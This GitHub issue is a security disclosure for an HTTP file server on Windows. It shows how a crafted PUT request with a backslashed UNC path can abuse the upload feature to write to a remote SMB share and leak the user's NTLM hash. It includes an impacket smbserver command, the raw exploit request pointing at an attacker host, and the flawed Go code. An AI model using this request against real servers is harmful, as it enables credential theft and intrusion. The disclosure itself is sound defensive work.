Skip to content

Security issue (windows) - Abuse --upload to steal NTLM-hash | fileWrite | RCE #34

@laluka

Description

@laluka

Hello there,
First thing first, congratz for this awesome new tool that will definitely be used a lot and loved! 💟

Now the real thing!

Description

If someone uses simpleserver on windows (while would they anyway...), (built with GOOS=windows GOARCH=386 go build cmd/simplehttpserver/simplehttpserver.go), there is a way to abuse the --upload feature to write a file on a network share, and this way steal the user's ntlm hash.
This could then be cracked offline and used to gain access to the server.

Reproduction

The issue can be reproduced with the following request thrown against simpleserver, which will then reach our smb server (here impacket): python examples/smbserver.py -smb2support share /dev/shm

PUT /\\192.168.1.25\share HTTP/1.1
Host: 192.168.1.21:8000
User-Agent: curl/7.68.0
Accept: */*
Content-Length: 6
Expect: 100-continue
Connection: close

dummy

image

Root cause & Mitigations

The path.Base function does not handle backslash, so some more sanitization should be added to take care of this.

image

The vulnerable code lives there:

err = handleUpload(path.Base(r.URL.Path), data)

func handleUpload(file string, data []byte) error {
return ioutil.WriteFile(file, data, 0655)
}

Happy patching, and have a nice day! 🌷

Metadata

Metadata

Assignees

Labels

Status: CompletedNothing further to be done with this issue. Awaiting to be closed.Type: EnhancementMost issues will probably ask for additions or changes.

Type

No type

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions